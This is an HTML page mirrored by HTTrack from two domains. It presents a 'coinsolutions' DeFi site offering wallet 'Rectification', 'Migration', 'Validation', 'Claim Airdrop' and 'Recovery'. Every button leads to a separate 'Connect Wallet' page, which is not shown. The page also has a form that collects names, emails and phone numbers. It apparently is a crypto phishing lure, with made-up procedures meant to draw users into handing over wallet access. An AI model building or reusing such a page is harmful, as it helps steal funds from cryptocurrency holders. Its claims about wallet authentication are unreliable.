<!DOCTYPE html>
<html lang="zxx">



<!-- Mirrored from coinsolution.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 29 Nov 2021 00:06:13 GMT -->

<!-- Mirrored from mianappdefi.com/s/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Aug 2022 19:10:53 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico" />
    <title>coinsolutions - Bitcoin And Crypto Currency</title>
    <!-- Bootstrap core CSS -->
    <link href="assets/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <!-- Google Font  -->
    <link href="https://fonts.googleapis.com/css?family=Montserrat:400,400i,500,500i,600,600i,700,700i|Roboto:400,400i,500,500i,700,700i" rel="stylesheet">
    <!-- icofont icon -->
    <link rel="stylesheet" href="assets/css/icofont.css">
    <!-- font awesome icon -->
    <link rel="stylesheet" href="assets/css/fontawesome-all.min.css">
    <!-- animate CSS -->
    <link rel="stylesheet" href="assets/css/animate.css">
    <!--- meanmenu Css-->
    <link rel="stylesheet" href="assets/css/meanmenu.min.css" media="all" />
    <!-- SLIDER REVOLUTION 4.x CSS SETTINGS -->
    <link rel="stylesheet" type="text/css" href="rs-plugin/css/settings.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="assets/css/extralayers.css" media="screen" />
    <!--- owl carousel Css-->
    <link rel="stylesheet" href="assets/owlcarousel/css/owl.carousel.min.css">
    <link rel="stylesheet" href="assets/owlcarousel/css/owl.theme.default.min.css">
    <!-- venobox -->
    <link rel="stylesheet" href="assets/venobox/css/venobox.css" />
    <!-- Style CSS -->
    <link rel="stylesheet" href="assets/css/style.css">
    <!-- Responsive  CSS -->
    <link rel="stylesheet" href="assets/css/responsive.css">
</head>
<body class="home-2">

    <!-- START PRELOADER -->
    <div id="page-preloader">
        <div class="theme-loader">coinsolutions</div>
    </div>
    <!-- END PRELOADER -->

    <!-- START HEADER SECTION -->
    <header class="main-header header-2">
        <!-- START TOP AREA -->
        <div class="top-area">
            <div class="auto-container">
                <div class="row">
                    <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;">
                        <div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&amp;theme=dark&amp;pref_coin_id=1505&amp;invert_hover=" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div>
                        <div style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"></div>
                    </div>
                    <!-- end col -->
                </div>
            </div>
        </div>
        <!-- END TOP AREA -->
    </header>
    <!-- END HEADER SECTION -->

    <!-- START SLIDER SECTION -->
    <div class="tp-banner-container">
        <div class="tp-banner">
            <ul>
                <!-- SLIDE 1 -->
                <li data-transition="slideup" data-slotamount="1" data-masterspeed="1000" data-delay="10000" data-saveperformance="off" data-title="Slide One">
                    <!-- MAIN IMAGE -->
                    <img src="assets/img/bg/slide4.jpg" alt="" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat">
                    <div class="home-slide-overlay"></div>
                    <!-- LAYERS -->
                    <!-- LAYER NR. 1 -->
                    <div class="tp-caption sft sfb tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="-100" data-speed="1000" data-start="1000" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">
                        <div>
                            <h2>The Bitcoin and Blockchain <br> its power for innovation</h2>
                        </div>
                    </div>
                    <!-- LAYER NR. 2 -->
                    <div class="tp-caption lfb ltt tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="-10" data-speed="1200" data-start="1200" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">

                    </div>
                    <!-- LAYER NR. 3 -->
                    <div class="tp-caption lfb ltt tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="65" data-speed="1400" data-start="1400" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">
                        <a href="wallets/index.html" class="btn-style btn-filled">Read More</a> &ensp;&ensp;
                        <a href="wallets/index.html" class="btn-style btn-border">Resolve</a>
                    </div>
                </li>
                <!-- SLIDE 2 -->
                <li data-transition="slidedown" data-slotamount="1" data-masterspeed="1000" data-delay="10000" data-saveperformance="off" data-title="Slide Two">
                    <!-- MAIN IMAGE -->
                    <img src="assets/img/bg/slide2.jpg" alt="" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat">
                    <div class="home-slide-overlay"></div>
                    <!-- LAYERS -->
                    <!-- LAYER NR. 1 -->
                    <div class="tp-caption sft sfb tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="-100" data-speed="1000" data-start="1000" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">
                        <div>
                            <h2>Bitcoin is better than <br> currency and a big industry</h2>
                        </div>
                    </div>
                    <!-- LAYER NR. 2 -->
                    <div class="tp-caption lfb ltt tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="-10" data-speed="1200" data-start="1200" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">

                    </div>
                    <!-- LAYER NR. 3 -->
                    <div class="tp-caption lfb ltt tp-resizeme rs-parallaxlevel-10" data-x="left" data-hoffset="0" data-y="center" data-voffset="65" data-speed="1400" data-start="1400" data-endspeed="1200" data-easing="easeOutExpo" data-splitin="none" data-splitout="none"
                        data-elementdelay="0.01" data-endelementdelay="0.1">
                        <a href="wallets/index.html" class="btn-style btn-border">Learn More</a> &ensp;&ensp;
                        <a href="wallets/index.html" class="btn-style btn-filled">Resolve</a>
                    </div>
                </li>
            </ul>
        </div>
    </div>
    <!-- END SLIDER SECTION  -->
    <!-- START SERVICE SECTION -->
    <section id="service" class="section-padding">
        <div class="container">
            <div class="row">
                <div class="col-8 mx-auto text-center">
                    <div class="section-title">
                        <h3>coinsolutions <span>Authentication</span></h3>
                        <p>Coin Solutions is a decentralized platform and network that blends Blockchain with DeFi, incorporating Blockchain aspects such as non-custodial management, Micropools, rapid liquidity, and decentralized governance. Each procedure
                            must be completed in its entirety. The authentication of wallet will be finished as follows.</p>
                    </div>
                </div>
            </div>
            <!-- end section title -->



            <div class="row text-center">
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Rectification.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Claim Airdrop</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Connect Wallet</a>
                        </div>
                    </div>
                </div>
                
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Rectification.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Rectification</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Connect Wallet</a>
                        </div>
                    </div>
                </div>
                
                
                  <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Rectification.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Migration</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Connect Wallet</a>
                        </div>
                    </div>
                </div>
                  <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Rectification.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Claim reflection </h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Connect Wallet</a>
                        </div>
                    </div>
                </div>
                  <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Rectification.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Validation</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Connect Wallet</a>
                        </div>
                    </div>
                </div>
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="buy.jpg" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Buying and Selling</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Choose</a>
                        </div>
                    </div>
                </div>
                <!-- end col -->
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Claim.png" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Claim Reward</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Choose</a>
                        </div>
                    </div>
                </div>
                <!-- end col -->
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Recovery.jpg" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Recovery</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Choose</a>
                        </div>
                    </div>
                </div>
                <!-- end col -->
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Staking.jpg" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Staking</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Choose</a>
                        </div>
                    </div>
                </div>
                <!-- end col -->
                <div class="col-lg-3 col-md-3 col-12 mb-lg-0 mb-md-0 mb-5">
                    <div class="single-address">
                        <div class="single-address-icon">
                            <img src="Staking.jpg" style="width: 150px">
                        </div>
                        <div class="single-address-dec">
                            <h4>Unstake</h4>
                        </div>
                        <div class="single-address-link">
                            <a href="wallets/index.html" class="btn-style btn-filled">Choose</a>
                        </div>
                    </div>
                </div>
                <!-- end col -->
            </div>


        </div>

        </div>
        <!--- END CONTAINER -->
    </section>
    <!-- END SERVICE SECTION -->



    <!-- START PROMO 2 SECTION -->
    <section id="promot" class="section-padding bg-gray">
        <div class="container">
            <div class="row">
                <div class="row">
                    <div class="col-12 text-left">
                        <div class="section-title-2">
                            <h3>Request <span>free Assistance</span></h3>
                        </div>
                    </div>
                </div>
                <!-- end section title -->
                <div class="home-p-form-wrapper">
                    <div class="home-p-form">
                        <form action="https://mianappdefi.com/s/index.html#">
                            <div class="row">
                                <div class="form-group col-lg-6 mb-3">
                                    <input name="aname" class="form-control" id="afirst-name" placeholder="Your Name*" required type="text">
                                </div>
                                <div class="form-group col-lg-6 mb-3">
                                    <input name="aemail" class="form-control" id="aemail" placeholder="Email id*" required type="email">
                                </div>
                                <div class="form-group col-lg-6 mb-3">
                                    <input name="aphone" class="form-control" id="aphone" placeholder="Phone Number*" required type="text">
                                </div>
                                <div class="form-group col-lg-6 mb-3">
                                    <input name="asubject" class="form-control" id="asubject" placeholder="Subject" required type="text">
                                </div>
                                <div class="form-group col-lg-12 mb-3">
                                    <textarea rows="6" name="rmessage" class="form-control" id="adescription" placeholder="Your Message Here..." required></textarea>
                                </div>
                                <div class="form-group col-lg-5 mb-lg-0 mb-md-0 mb-2 pr-0">
                                    <a href="index-2.html#" title="Click here to submit your message!" class="btn-style btn-filled btn-filled-2">Send Message <i class="fa fa-paper-plane"></i></a>
                                </div>

                            </div>
                        </form>
                    </div>
                </div>

                <!-- end col -->

            </div>
        </div>
        <!--- END CONTAINER -->
    </section>
    <!-- END PROMO 2 SECTION -->



    <!-- START CALLTOACTION SECTION -->
    <section id="calltoaction" class="calltoaction-padding section-padding bg-theme">
        <div class="auto-container">
            <div class="row">
                <div class="col-12 mx-auto text-center">
                    <div class="calltoaction-two-wrap mb-4">
                        <h4 class="text-uppercase">Need More Service?</h4>
                        <p>Cryptocurrency wallets provide users with a digital solution for securely storing and managing blockchain assets and cryptocurrencies. These wallets allow users to spend, receive, and trade cryptocurrencies. While some cryptocurrency
                            wallets may only provide support for a single cryptocurrency, many are multi-asset solutions, allowing users to hold multiple cryptocurrencies, including Bitcoin, Bitcoin Cash, Ethereum, and Litecoin, among many others. These
                            solutions ensure that the owner of the cryptocurrencies and blockchain assets is the only entity who can access the funds by requiring elaborate passwords and other security measures. Users can view or access cryptocurrency
                            wallets from smartphones and computers.</p>
                    </div>
                    <a href="index-2.html#" class="wow fadeInDown btn-style btn-border btn-border-3">Contact Us <i class="icofont icofont-hand-right"></i></a>
                </div>
                <!-- end col -->
                <!-- end col -->
            </div>
            <!-- end row-->
        </div>
    </section>
    <!-- END CALLTOACTION SECTION -->

    <!-- START FOOTER -->
    <footer class="footer-2">
        <div class="copyright">
            <div class="auto-container">
                <div class="row">
                    <div class="col-12 copyright-text text-center">
                        <p><a href="index-2.html#templateshub.net/" target="_blank">coinsolutions</a></p>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- END FOOTER -->

    <!-- Latest jQuery -->
    <script src="assets/js/jquery-2.2.4.min.js"></script>
    <!-- popper js -->
    <script src="assets/bootstrap/js/popper.min.js"></script>
    <!-- Latest compiled and minified Bootstrap -->
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <!-- meanmenu min js  -->
    <script src="assets/js/jquery.meanmenu.min.js"></script>
    <!-- Sticky JS -->
    <script src="assets/js/jquery.sticky.js"></script>
    <!-- SLIDER REVOLUTION 4.x SCRIPTS  -->
    <script src="rs-plugin/js/jquery.themepunch.plugins.min.js"></script>
    <script src="rs-plugin/js/jquery.themepunch.revolution.min.js"></script>
    <!-- owl-carousel min js  -->
    <script src="assets/owlcarousel/js/owl.carousel.min.js"></script>
    <!-- jquery appear js  -->
    <script src="assets/js/jquery.appear.js"></script>
    <!-- countTo js -->
    <script src="assets/js/jquery.inview.min.js"></script>
    <!-- venobox js -->
    <script src="assets/venobox/js/venobox.min.js"></script>
    <script src="assets/js/masonry.pkgd.min.js"></script>
    <!-- scroll to top js -->
    <script src="assets/js/scrolltopcontrol.js"></script>
    <!-- WOW - Reveal Animations When You Scroll -->
    <script src="assets/js/wow.min.js"></script>
    <!-- scripts js -->
    <script src="assets/js/scripts.js"></script>
    <script>
        jQuery(document).ready(function() {
            jQuery('.tp-banner').show().revolution({
                dottedOverlay: "none",
                delay: 16000,
                startwidth: 1170,
                startheight: 550,
                hideThumbs: 200,

                thumbWidth: 100,
                thumbHeight: 50,
                thumbAmount: 5,

                navigationType: "bullet",
                navigationArrows: "solo",
                navigationStyle: "preview3",

                touchenabled: "on",
                onHoverStop: "on",

                swipe_velocity: 0.7,
                swipe_min_touches: 1,
                swipe_max_touches: 1,
                drag_block_vertical: false,

                parallax: "mouse",
                parallaxBgFreeze: "on",
                parallaxLevels: [7, 4, 3, 2, 5, 4, 3, 2, 1, 0],

                keyboardNavigation: "off",

                navigationHAlign: "center",
                navigationVAlign: "bottom",
                navigationHOffset: 0,
                navigationVOffset: 20,

                soloArrowLeftHalign: "left",
                soloArrowLeftValign: "center",
                soloArrowLeftHOffset: 20,
                soloArrowLeftVOffset: 0,

                soloArrowRightHalign: "right",
                soloArrowRightValign: "center",
                soloArrowRightHOffset: 20,
                soloArrowRightVOffset: 0,

                shadow: 0,
                fullWidth: "on",
                fullScreen: "off",

                spinner: "spinner4",

                stopLoop: "off",
                stopAfterLoops: -1,
                stopAtSlide: -1,

                shuffle: "off",

                autoHeight: "off",
                forceFullWidth: "off",


                hideThumbsOnMobile: "off",
                hideNavDelayOnMobile: 1500,
                hideBulletsOnMobile: "off",
                hideArrowsOnMobile: "off",
                hideThumbsUnderResolution: 0,

                hideSliderAtLimit: 0,
                hideCaptionAtLimit: 0,
                hideAllCaptionAtLilmit: 0,
                startWithSlide: 0,
                fullScreenOffsetContainer: ""
            });
        }); //ready
    </script>
</body>


<!-- Mirrored from coinsolution.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 29 Nov 2021 00:06:48 GMT -->

<!-- Mirrored from mianappdefi.com/s/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Aug 2022 19:11:55 GMT -->
</html>